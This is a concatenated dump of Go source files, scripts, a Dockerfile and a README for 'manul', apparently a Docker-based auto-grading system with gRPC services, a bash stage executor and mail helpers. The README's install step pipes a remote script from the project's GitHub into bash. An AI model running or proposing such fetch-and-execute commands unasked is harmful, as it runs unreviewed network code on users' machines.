= append(names, s.Config.Sender) } s.From(s.Config.DefaultFrom, names...) return s } func (s *SMTPSession) From(from string, name ...string) *SMTPSession { if len(name) > 0 { log.Infof("from: <%s> <%s>", from, name[0]) s.Message.SetHeaders(map[string][]string{ "From": {s.Message.FormatAddress(from, name[0])}, }) } else { s.Message.SetHeader("From", from) } return s } func (s *SMTPSession) To(to string, name ...string) *SMTPSession { if len(name) > 0 { s.Message.SetHeader("To", to, name[0]) } else { s.Message.SetHeader("To", to) } return s } func (s *SMTPSession) Cc(cc string, name ...string) *SMTPSession { if len(name) > 0 { s.Message.SetHeader("Cc", cc, name[0]) } else { s.Message.SetHeader("Cc", cc) } return s } func (s *SMTPSession) Subject(subject string) *SMTPSession { s.Message.SetHeader("Subject", subject) return s } func (s *SMTPSession) PlainBody(body string, alternative ...string) *SMTPSession { s.Message.SetBody("text/plain", body) if len(alternative) > 0 { s.Message.AddAlternative("text/html", alternative[0]) } return s } func (s *SMTPSession) HtmlBody(body string) *SMTPSession { s.Message.SetBody("text/html", body) return s } func (s *SMTPSession) Attach(path string, name ...string) *SMTPSession { if len(name) > 0 { s.Message.Attach(path, gomail.Rename(name[0])) } else { s.Message.Attach(path) } return s } func (s *SMTPSession) WithDate() *SMTPSession { m := s.Message m.SetHeaders(map[string][]string{ "X-Date": {m.FormatDate(time.Now())}, }) return s } func (s *SMTPSession) Send(to, subject, body string) error { s.To(to) s.Subject(subject) s.HtmlBody(body) return s.Dialer.DialAndSend(s.Message) } func (s *SMTPSession) Perform() error { return s.Dialer.DialAndSend(s.Message) } <file_sep>#!/usr/bin/env bash find . -name '*.go' | xargs -n 1 -I{} -P 6 sh -c 'echo "reformat: {}" && gofmt -w {}' <file_sep>package service import ( "context" "errors" "fmt" pb "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "gopkg.in/mgo.v2/bson" "os" "path" "sync" "time" ) type ProjectServiceImpl struct { env *Env muFs *sync.Mutex } func NewProjectServiceImpl(env *Env) *ProjectServiceImpl { return &ProjectServiceImpl{ env: env, muFs: &sync.Mutex{}, } } func (p *ProjectServiceImpl) InitProjectWorkdir(id string) (err error) { p.muFs.Lock() defer p.muFs.Unlock() base := p.env.SpawnProjectWorkdir().Goto(id) if base.Exists("/") || base.IsDir("/") { return errors.New("already exists") } else { // init folder base.MkdirAll("/", 0700) } return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) ListProjects(context.Context, *pb.ListProjectsRequest) (*pb.ListProjectsResponse, error) { return nil, errors.New("implement me") } func (p *ProjectServiceImpl) createProject(base *workdir.Workdir, id, name, desc, createdBy string) (proj *model.Project, err error) { mc := p.env.SpawnMgoCli() defer mc.Close() pid, e := mongo.SafeToObjectId(id) if e != nil { pid = mongo.NewObjectId() } projCfg, e := model.LoadProjectConfig(base.Path("manul.project.yml")) if e != nil { log.Errorf("Create failed... removing folder : %v err: %v", base.GetCwd(), base.RemoveCwd()) return nil, e } proj = &model.Project{ Id: pid, Name: name, Desc: desc, CreateTime: time.Now(), UpdatedTime: time.Now(), CreatedBy: createdBy, Config: projCfg, } err = mc.Insert(DbProjectColl, proj) return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) CreateProject(ctx context.Context, req *pb.CreateProjectRequest) (ret *pb.CreateProjectResponse, e error) { log.Infof("Create project...") if ucli, err := p.env.ParseAuthInfo(ctx, req.Auth); err != nil || ucli.UserType != model.UserType_ADMIN { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err), } ret = &pb.CreateProjectResponse{ Success: false, Result: &pb.CreateProjectResponse_Error{ Error: st.ToPbStatus(), }, } return } else { reqProj := req.Project id := mongo.NewObjectId().Hex() name := reqProj.Name desc := reqProj.Desc if err := p.InitProjectWorkdir(id); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: "unexpected folder already exists", } ret = &pb.CreateProjectResponse{ Success: false, Result: &pb.CreateProjectResponse_Error{ Error: st.ToPbStatus(), }, } return } else { base := p.env.SpawnProjectWorkdir().Goto(id).Rebase() // write files here for _, f := range reqProj.Files.Data { var perm os.FileMode = 0600 if f.Meta != nil && f.Meta.Fields != nil { if cp, ok := f.Meta.Fields["perm"]; ok { fcp := cp.GetNumberValue() log.Debugf("file: [%v] => [%v] , perm: %v", f.Path, f.Name, fcp) if fcp > 0 && fcp <= 0777 { perm = os.FileMode(fcp) } } } base.WriteFile(path.Join(f.Path, f.Name), f.Data, perm) } if rp, err := p.createProject(base, id, name, desc, ucli.Name); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("Internal Error: %v", err), } ret = &pb.CreateProjectResponse{ Success: false, Result: &pb.CreateProjectResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.CreateProjectResponse{ Success: true, Result: &pb.CreateProjectResponse_Project{ Project: rp.ToPbProject(true), }, } return } } } return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) UpdateProject(context.Context, *pb.UpdateProjectRequest) (*pb.UpdateProjectResponse, error) { return nil, errors.New("implement me") } func (s *ProjectServiceImpl) findProject(id string, name string) (project *model.Project, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} badreq := true if pid, e := mongo.SafeToObjectId(id); e == nil { q["_id"] = pid badreq = false } if name != "" { q["name"] = name badreq = false } if badreq { return nil, errors.New("missing args") } log.Infof("query: %v", q) err = mc.One(DbProjectColl, q, &project) return } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) GetProject(context.Context, *pb.GetProjectRequest) (*pb.GetProjectResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) GetProjectChecklist(context.Context, *pb.GetProjectChecklistRequest) (*pb.GetProjectChecklistResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) DeleteProject(context.Context, *pb.DeleteProjectRequest) (*pb.DeleteProjectResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) UpdateProjectMember(context.Context, *pb.UpdateProjectMemberRequest) (*pb.UpdateProjectMemberResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (p *ProjectServiceImpl) ListProjectMembers(context.Context, *pb.ListProjectMembersRequest) (*pb.ListProjectMembersResponse, error) { return nil, errors.New("implement me") } <file_sep>package helpers import ( "math/rand" "testing" "time" ) func TestRandomString(t *testing.T) { rand.Seed(time.Now().Unix()) s := RandomString(10, CharsetDigit) t.Logf("Random Digits: %s", s) if len(s) != 10 { t.Fatalf("Incorrect Size:: %v", len(s)) } s = RandomString(10, CharsetCharLowerCase) t.Logf("Random Lowercase: %s", s) if len(s) != 10 { t.Fatalf("Incorrect Size:: %v", len(s)) } s = RandomString(10, CharsetHex) t.Logf("Random HexDigits: %s", s) if len(s) != 10 { t.Fatalf("Incorrect Size:: %v", len(s)) } } <file_sep>package config func GetFsWorkdir() string { return getStringOrDefault(KeyFsWorkdir, "/tmp/manul/workdir") } <file_sep>package helpers import ( "fmt" "os/exec" "strings" ) type BashScriptStage struct { Name string Scripts []string } func NewBashScriptStage(name string, scripts ...string) *BashScriptStage { return &BashScriptStage{ Name: name, Scripts: scripts, } } func (e *BashScriptStage) EncodedScripts(job string) []string { scripts := []string{ fmt.Sprintf("echo 'manul:%s:stage:start:%s'", job, e.Name), } for _, script := range e.Scripts { prompt := fmt.Sprintf("echo '$ %s'", strings.Replace(script, "'", "'\\''", -1)) scripts = append(scripts, prompt, script) } scripts = append(scripts, fmt.Sprintf("echo 'manul:%s:stage:end:%s'", job, e.Name)) return scripts } func (e *BashScriptStage) AddScripts(scripts ...string) *BashScriptStage { e.Scripts = append(e.Scripts, scripts...) return e } func (e *BashScriptStage) SetScripts(scripts ...string) *BashScriptStage { e.Scripts = scripts return e } type BashScriptsExecutor struct { Id string Env []string Stages []BashScriptStage } func NewBashScriptsExecutor(id string, env ...string) *BashScriptsExecutor { return &BashScriptsExecutor{ Id: id, Env: env, } } func (e *BashScriptsExecutor) AddEnv(env ...string) *BashScriptsExecutor { e.Env = append(e.Env, env...) return e } func (e *BashScriptsExecutor) SetEnv(env ...string) *BashScriptsExecutor { e.Env = env return e } func (e *BashScriptsExecutor) AddStage(stage *BashScriptStage) *BashScriptsExecutor { e.Stages = append(e.Stages, *stage) return e } func (e *BashScriptsExecutor) AddScriptsInStage(name string, scripts ...string) *BashScriptsExecutor { stage := NewBashScriptStage(name, scripts...) e.Stages = append(e.Stages, *stage) return e } func (e *BashScriptsExecutor) EncodedScript() string { scripts := []string{ "set -Eeo pipefail", } for _, stage := range e.Stages { scripts = append(scripts, stage.EncodedScripts(e.Id)...) } return strings.Join(scripts, ";") } func (e *BashScriptsExecutor) Perform() ([]byte, error) { cfg := exec.Command("bash", "-c", e.EncodedScript()) cfg.Env = e.Env return cfg.CombinedOutput() } <file_sep>package main import ( "fmt" "github.com/argcv/manul/cmd/manul/command/client" "github.com/argcv/manul/cmd/manul/command/server" "github.com/argcv/manul/cmd/manul/command/shell" "github.com/argcv/manul/version" configeh "github.com/argcv/webeh/config" "github.com/argcv/webeh/log" "github.com/spf13/cobra" "math/rand" "os" "path" "time" ) var ( rootCmd = &cobra.Command{ Use: "manul", Short: "Manul is an Auto Grader", PersistentPreRunE: func(cmd *cobra.Command, args []string) error { log.Infof("Manul version: %s (%s) Built At: %v", version.Version, version.GitHash, version.BuildDate) if verbose, err := cmd.Flags().GetBool("verbose"); err == nil { if verbose { log.Verbose() log.Debug("verbose mode: ON") } } conf, _ := cmd.Flags().GetString("config") if e := configeh.LoadConfig(configeh.Option{ Project: "manul", Path: conf, DefaultPath: path.Join(os.Getenv("HOME"), ".manul"), FileMustExists: true, }); e != nil { return e } // set rand seed rand.Seed(time.Now().Unix()) return nil }, } versionCmd = &cobra.Command{ Use: "version", Short: "Prints the version of manul.", // do not execute any persistent actions PersistentPreRun: func(cmd *cobra.Command, args []string) {}, Run: func(cmd *cobra.Command, args []string) { fmt.Println("manul version:", version.Version) fmt.Println("Git commit hash:", version.GitHash) if version.BuildDate != "" { fmt.Println("Build date:", version.BuildDate) } }, } ) func init() { rootCmd.AddCommand( versionCmd, server.NewManulRpcServerCommand(), client.NewManulProjectCommand(), client.NewManulJobCommand(), shell.NewShellCommand(), shell.NewSetupCommand(), shell.NewLoginCommand(), ) rootCmd.PersistentFlags().StringP("config", "c", "", "explicit assign a configuration file") rootCmd.PersistentFlags().BoolP("verbose", "v", false, "log verbose") } func main() { if err := rootCmd.Execute(); err != nil { log.Infof("%v", err) os.Exit(1) } } <file_sep>/* * The MIT License (MIT) * * Copyright (c) 2018 <NAME> <<EMAIL>> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. * */ package helpers /** * Fair Queue: * a fifo queue, which is used to help us schedule the * sequence of execution * * It could also treated as some kind of Lock */ type FairQueue struct { c chan func() wg *WaitGroupWithState sd *SingletonDesc } func NewFairQueue() *FairQueue { return &FairQueue{ c: make(chan func()), wg: NewWaitGroupWithState(), sd: NewSingleton(), } } func (q *FairQueue) Perform() { go q.sd.Acquire(func() { for f := range q.c { f() if q.wg.Done() == 0 { return } } }) } func (q *FairQueue) Enqueue(f func()) { q.wg.Add(1) q.Perform() q.c <- f } func (q *FairQueue) Wait() { q.Perform() q.wg.Wait() } // It's OK to leave a Go channel open forever and never close it. // When the channel is no longer used, it will be garbage collected. // -- <https://stackoverflow.com/questions/8593645> // However we could provide a close + wait interface, which is used // to indicate its finishing func (q *FairQueue) Close() { close(q.c) q.Wait() } <file_sep>package main import ( "fmt" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" "golang.org/x/net/context" "io/ioutil" "os" "path" "time" ) func main() { //basedir, e := helpers.GetPathOfSelf() // //if e != nil { // panic("get current path failed") //} basedir, e := os.Getwd() if e != nil { panic("get current path failed") } cfg, e := model.LoadProjectConfig(path.Join(basedir, "manul.project.yml.default")) if e != nil { panic(fmt.Sprintf("load configure file failed...: %v", e)) } containerName := "greeting" ctx := context.Background() cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.37"), func(c *client.Client) error { log.Warnf("Get Version: %v", c.ClientVersion()) return nil }) cli.ClientVersion() if err != nil { panic(err) } images, err := cli.ImageList(ctx, types.ImageListOptions{}) for _, image := range images { log.Infof("IMG: %v %v %v", image.ID, image.RepoTags, image.RepoDigests) } //reader, err := cli.ImagePull(ctx, "docker.io/library/alpine", types.ImagePullOptions{}) reader, err := cli.ImagePull(ctx, "fedora", types.ImagePullOptions{}) if err != nil { panic(err) } pullMsg, err := ioutil.ReadAll(reader) if err != nil { panic(err) } log.Infof("Pull Message: [%v]", string(pullMsg)) bse := cfg.ToBashScriptsExecutor() bse.Id = "Job1" volumes := []string{} for _, volume := range cfg.Volume { volumes = append(volumes, fmt.Sprintf("%v/%v", basedir, volume)) } resp, err := cli.ContainerCreate(ctx, &container.Config{ Image: cfg.Image, Entrypoint: []string{"bash", "-c"}, //Cmd: []string{"/proc/meminfo"}, //Cmd: []string{"ls -a /usr"}, Env: cfg.Env, Cmd: []string{bse.EncodedScript()}, Tty: true, Hostname: "bootcamp", Domainname: "local", }, &container.HostConfig{ //Binds: []string{ // //fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), // fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), //}, Binds: volumes, Resources: container.Resources{ Memory: int64(cfg.MaximumMemMb) * 1024 * 1024, //Memory: 1024 * 1024 * 5, // 100 MB //KernelMemory: 1024 * 1024 * 1, // 100 MB //Memory int64 // Memory limit (in bytes) }, }, nil, containerName) if err != nil { panic(err) } log.Infof("resp.id: %v", resp.ID) if err := cli.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}); err != nil { panic(err) } statusCh, errCh := cli.ContainerWait(ctx, resp.ID, container.WaitConditionNotRunning) select { case err := <-errCh: if err != nil { panic(err) } case st := <-statusCh: log.Infof("Wait... %v, %v", st.StatusCode, st.Error) } logs, err := cli.ContainerLogs(ctx, resp.ID, types.ContainerLogsOptions{ShowStdout: true}) if err != nil { panic(err) } logsMsg, err := ioutil.ReadAll(logs) if err != nil { panic(err) } log.Infof("Log: [%v]", string(logsMsg)) var expire = 1 * time.Second err = cli.ContainerStop(ctx, resp.ID, &expire) if err != nil { log.Errorf("Error: %v", err) } err = cli.ContainerRemove(ctx, resp.ID, types.ContainerRemoveOptions{ RemoveVolumes: true, Force: true, }) if err != nil { panic(err) } log.Infof("Done.") } <file_sep>package config import ( "github.com/argcv/go-argcvapis/app/manul/user" ) func GetClientUserName() string { return getStringOrDefault(KeyClientUserName, "") } func GetClientUserSecret() string { return getStringOrDefault(KeyClientUserSecret, "") } func SetClientUserName(user string) error { return setConfig(KeyClientUserName, user) } func SetClientUserSecret(secret string) error { return setConfig(KeyClientUserSecret, secret) } func GetAuthInfo() (auth *user.AuthToken) { auth = &user.AuthToken{ Name: GetClientUserName(), Secret: GetClientUserSecret(), } return } <file_sep>#!/usr/bin/env bash mongo -u 'manul' -p '<PASSWORD>' --authenticationDatabase admin localhost:27017/admin <file_sep>package client import ( "fmt" "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/config" "github.com/argcv/webeh/log" "google.golang.org/grpc" ) type RpcConn struct { C *grpc.ClientConn } func NewGrpcConn() (c *RpcConn) { rpcHost := config.GetRpcHost() rpcPort := config.GetRpcPort() serverAddr := fmt.Sprintf("%s:%d", rpcHost, rpcPort) opts := []grpc.DialOption{ grpc.WithInsecure(), } c = &RpcConn{} conn, err := grpc.Dial(serverAddr, opts...) c.C = conn if err != nil { log.Fatalf("fail to dial: %v", err) } return } func (c *RpcConn) Close() { c.C.Close() } func (c *RpcConn) NewProjectCli() project.ProjectServiceClient { return project.NewProjectServiceClient(c.C) } func (c *RpcConn) NewUserCli() user.UserServiceClient { return user.NewUserServiceClient(c.C) } func (c *RpcConn) NewJobCli() job.JobServiceClient { return job.NewJobServiceClient(c.C) } <file_sep>package version var ( Version = "0.0.1" GitHash = "unknown" BuildDate string = "unknown" ) <file_sep>package workdir import ( "github.com/argcv/go-argcvapis/app/manul/file" "github.com/argcv/manul/helpers" "github.com/argcv/webeh/log" "github.com/pkg/errors" "io/ioutil" "os" "path" ) type Workdir struct { Base string Cwd string isRoot bool parent *Workdir } func NewWorkdir(base string) *Workdir { base = path.Clean(base) dir, err := helpers.GetPathOfSelf() if err != nil { log.Errorf("Get Current GetCwd failed... %v", err) dir = "/tmp" } if base[0] != '/' { // relative path base = path.Join(dir, base) } os.MkdirAll(base, 0700) env := &Workdir{ Base: base, Cwd: "/", isRoot: true, } env.parent = env return env } func (env *Workdir) Spawn() (sub *Workdir) { return &Workdir{ Base: env.Base, Cwd: env.Cwd, isRoot: false, parent: env, } } func (env *Workdir) Rebase() (sub *Workdir) { return &Workdir{ Base: path.Join(env.Base, env.Cwd), Cwd: "/", isRoot: false, parent: env, } } func (env *Workdir) GetRoot() *Workdir { if env.isRoot { return env } else { return env.parent.GetRoot() } } // Placeholder, close func (env *Workdir) Close() { if env.isRoot { } else { } } func (env *Workdir) GetCwd() string { return path.Join(env.Base, env.Cwd) } func (env *Workdir) RemoveCwd() error { return os.RemoveAll(path.Join(env.Base, env.Cwd)) } func (env *Workdir) Split() (dir, file string) { return path.Split(env.GetCwd()) } func (env *Workdir) Path(filename string) string { return path.Join(env.Base, env.Cwd, filename) } func (env *Workdir) Remove(filename string) error { return os.RemoveAll(env.Path(filename)) } func (env *Workdir) Goto(dir ...string) *Workdir { dirs := []string{ env.Cwd, } dirs = append(dirs, dir...) env.Cwd = path.Join(dirs...) return env } func (env *Workdir) MkdirAll(filename string, perm os.FileMode) (err error) { dirTarget := env.Path(filename) if err = os.MkdirAll(dirTarget, perm); err != nil { log.Errorf("Create folder failed: %v", err) return } else { return nil } } func (env *Workdir) WriteFile(filename string, data []byte, perm os.FileMode) (err error) { tdir, tfile := path.Split(filename) dirTarget := path.Join(env.Base, env.Cwd, tdir) if err = os.MkdirAll(dirTarget, 0700); err != nil { log.Errorf("Create folder failed: %v", err) return } else { return ioutil.WriteFile(path.Join(dirTarget, tfile), data, perm) } } func (env *Workdir) ReadFile(filename string) ([]byte, error) { return ioutil.ReadFile(env.Path(filename)) } func (env *Workdir) Stat(filename string) (os.FileInfo, error) { return os.Stat(env.Path(filename)) } func (env *Workdir) Exists(filename string) bool { if _, err := env.Stat(filename); os.IsNotExist(err) { return false } else { return true } } func (env *Workdir) IsDir(filename string) bool { if mode, err := env.Stat(filename); os.IsNotExist(err) { return false } else { return mode.IsDir() } } func (env *Workdir) IsFile(filename string) bool { if mode, err := env.Stat(filename); os.IsNotExist(err) { return false } else { return !mode.IsDir() } } func (env *Workdir) ReadDir(filename string) ([]os.FileInfo, error) { return ioutil.ReadDir(env.Path(filename)) } func (env *Workdir) IterFiles(dir string, handler func(*file.File) error) (err error) { if !env.Exists(dir) { return errors.New("dir not exists") } if s, e := env.Stat(dir); e == nil { if s.IsDir() { if fl, err := env.ReadDir(dir); err != nil { log.Errorf("read dir %s(%s) failed: %v", dir, s.Name(), err) return err } else { for _, f := range fl { env.IterFiles(path.Join(dir, f.Name()), handler) } } } else { mode := s.Mode() size := s.Size() if data, e := env.ReadFile(dir); e != nil { log.Errorf("read file %s(%s) failed: %v", dir, s.Name(), err) } else { cpath, _ := path.Split(dir) meta := map[string]interface{}{ "perm": mode, } fh := &file.File{ Name: s.Name(), Path: cpath, Size: uint64(size), Meta: helpers.ToStruct(meta), Data: data, } handler(fh) } } } return nil } <file_sep>/* * The MIT License (MIT) * * Copyright (c) 2018 <NAME> <<EMAIL>> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. * */ package helpers import ( "github.com/argcv/webeh/log" "runtime" "sync/atomic" ) type WaitGroupWithState struct { st int64 } func NewWaitGroupWithState() *WaitGroupWithState { return &WaitGroupWithState{ st: 0, } } func (wg *WaitGroupWithState) Add(delta int64) int64 { newSt := atomic.AddInt64(&(wg.st), delta) if newSt < 0 { log.Fatalf("ERROR: status is lower than 0!!! (%v)", newSt) } return newSt } func (wg *WaitGroupWithState) Done() int64 { return wg.Add(-1) } func (wg *WaitGroupWithState) State() int64 { return atomic.LoadInt64(&(wg.st)) } func (wg *WaitGroupWithState) Wait() { for wg.State() > 0 { runtime.Gosched() } } <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" ) func (e *Env) AddLogin() { cmd := &ishell.Cmd{ Name: "login", Help: "login", Func: func(c *ishell.Context) { c.Println("Login...: ", c.Args) }, } e.Sh.AddCmd(cmd) } <file_sep>#!/usr/bin/env bash if [ -z $GOPATH ]; then echo "error: env: GOPATH not exists!!" exit 1 fi ORG_DIR="$GOPATH/src/github.com/argcv" PROJ_DIR="$ORG_DIR/manul" if [ ! -d $PROJ_DIR ]; then mkdir -p $PROJ_DIR git clone <EMAIL>:argcv/manul.git $PROJ_DIR echo "Cloned to $PROJ_DIR" fi pushd $PROJ_DIR > /dev/null 2>&1 if [[ $(git status --porcelain) ]]; then echo "Found uncommitted change" exit 2 else echo "Update..." git pull origin fi popd > /dev/null 2>&1 <file_sep>package config import ( "fmt" "github.com/argcv/webeh/log" "github.com/pkg/errors" "github.com/spf13/viper" "os" "path/filepath" "strings" ) var ( kProjectName = "manul" ) // this function will search and load configurations func LoadConfig(path string) (err error) { viper.SetConfigName(kProjectName) viper.SetEnvPrefix(kProjectName) if path != "" { viper.SetConfigFile(path) } else { viper.AddConfigPath(".") viper.AddConfigPath("..") viper.AddConfigPath("$HOME/") viper.AddConfigPath(fmt.Sprintf("$HOME/.%s/", kProjectName)) viper.AddConfigPath("/etc/") viper.AddConfigPath(fmt.Sprintf("/etc/%s/", kProjectName)) if conf := os.Getenv(fmt.Sprintf("%s_CFG", strings.ToUpper(kProjectName))); conf != "" { viper.SetConfigFile(conf) } } err = viper.ReadInConfig() if _, ok := err.(viper.ConfigFileNotFoundError); !ok && err != nil { log.Errorf("Load configure failed: %s", err.Error()) return err } if conf := viper.ConfigFileUsed(); conf != "" { wd, _ := os.Getwd() if rel, _ := filepath.Rel(wd, conf); rel != "" && strings.Count(rel, "..") < 3 { conf = rel } log.Infof("Using config file: %s", conf) return nil } else { msg := "No configure file" log.Warnf(msg) return errors.New(msg) } } <file_sep>package server import ( "fmt" "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/go-argcvapis/app/manul/secret" "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/config" "github.com/argcv/manul/service" "github.com/argcv/webeh/log" "github.com/grpc-ecosystem/grpc-gateway/runtime" "github.com/spf13/cobra" "golang.org/x/net/context" "google.golang.org/grpc" "net" "net/http" ) func NewManulRpcServerCommand() *cobra.Command { cmd := &cobra.Command{ Use: "serve", Short: "Rpc Server", RunE: func(cmd *cobra.Command, args []string) (err error) { rpcBind := config.GetRpcBind() rpcPort := config.GetRpcPort() httpBind := config.GetHttpBind() httpPort := config.GetHttpPort() log.Infof("The RPC Server starting.. %s:%d", rpcBind, rpcPort) log.Infof("The HTTP Server starting.. %s:%d", httpBind, httpPort) lis, err := net.Listen("tcp", fmt.Sprintf("%s:%d", rpcBind, rpcPort)) if err != nil { log.Infof("failed to listen: %v", err) return } maxRecvMsgSizeMB := config.GetRpcOptionMaxRecvMsgSizeMB() maxSendMsgSizeMB := config.GetRpcOptionMaxSendMsgSizeMB() opts := []grpc.ServerOption{ grpc.MaxRecvMsgSize(1024 * 1024 * maxRecvMsgSizeMB), grpc.MaxSendMsgSize(1024 * 1024 * maxSendMsgSizeMB), } log.Infof("[Option] MaxRecvMsgSize(mb): %d", maxRecvMsgSizeMB) log.Infof("[Option] MaxSendMsgSize(mb): %d", maxSendMsgSizeMB) grpcServer := grpc.NewServer(opts...) env, err := service.NewManulGlobalEnv() if err != nil { return err } // register servers here user.RegisterUserServiceServer(grpcServer, env.UserService) secret.RegisterSecretServiceServer(grpcServer, env.SecretService) project.RegisterProjectServiceServer(grpcServer, env.ProjectService) job.RegisterJobServiceServer(grpcServer, env.JobService) go func() { log.Infof("Sterted Rpc... %s:%d", rpcBind, rpcPort) grpcServer.Serve(lis) }() // http... listenString := fmt.Sprintf("%s:%d", httpBind, httpPort) ctx := context.Background() ctx, cancel := context.WithCancel(ctx) defer cancel() gwmux := runtime.NewServeMux() //err = pb.RegisterTasksHandlerFromEndpoint(ctx, gwmux, fmt.Sprintf("%s:%d", "127.0.0.1", rpcPort), // []grpc.DialOption{grpc.WithInsecure()}, //) rpcProxy := fmt.Sprintf("%s:%d", "127.0.0.1", rpcPort) // bind endpoints start err = user.RegisterUserServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for user failed: %v\n", err) return } err = secret.RegisterSecretServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for secret failed: %v\n", err) return } err = project.RegisterProjectServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for project failed: %v\n", err) return } err = job.RegisterJobServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for job failed: %v\n", err) return } // bind endpoints finished log.Infof(fmt.Sprintf("Sterted http:... %s", listenString)) err = http.ListenAndServe(listenString, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { // hosting request here gwmux.ServeHTTP(w, r) })) if err != nil { panic(err) } return }, } return cmd } <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" "strings" ) type Env struct { Sh *ishell.Shell prompts []string } func NewEnv() (e *Env) { shell := ishell.New() e = &Env{ Sh: shell, prompts: []string{}, } e.init() return } func (e *Env) PopPrompt() { if len(e.prompts) > 1 { e.prompts = e.prompts[0 : len(e.prompts)-1] e.Sh.SetPrompt(e.prompts[len(e.prompts)-1]) } else { e.Printf("Unexpected PopPrompt...?") } } func (e *Env) init() { sh := e.Sh // display welcome info. e.Println("Manul Interactive.") e.Println("Type Help to get more information") e.PushPrompt("manul > ") sh.NotFound(func(c *ishell.Context) { c.Printf("Command Not Recognized : [%v]\n", strings.Join(c.Args, "], [")) }) e.AddLogin() e.AddSetup() } <file_sep>FROM golang:1.9.3 as builder ADD . /go/src/github.com/argcv/manul RUN cd /go/src/github.com/argcv/manul && bash ./build.sh FROM scratch # x509: failed to load system roots and no roots provided COPY --from=builder /etc/ssl/certs/ca-certificates.crt /etc/ssl/certs/ca-certificates.crt #COPY --from=builder /go/bin/sunlab-api /sunlab-api COPY --from=builder /go/src/github.com/argcv/manul/manul /manul COPY --from=builder /go/src/github.com/argcv/manul/manul-entrypoint /manul-entrypoint EXPOSE 35000 EXPOSE 35001 ENTRYPOINT ["/manul"] <file_sep># manul A docker based auto grading system ## Install or Update ```bash curl https://raw.githubusercontent.com/argcv/manul/master/get.sh | bash ``` <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" "github.com/argcv/manul/client/mail" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" ) func (e *Env) AddSmtp() { cmd := &ishell.Cmd{ Name: "smtp", Help: "smtp sender", Func: func(c *ishell.Context) { if session, err := mail.NewSMTPSession(); err != nil { log.Errorf("new smtp session failed: %v", err) } else { session.DefaultFrom() session.To("<EMAIL>") session.Subject("Hello~") 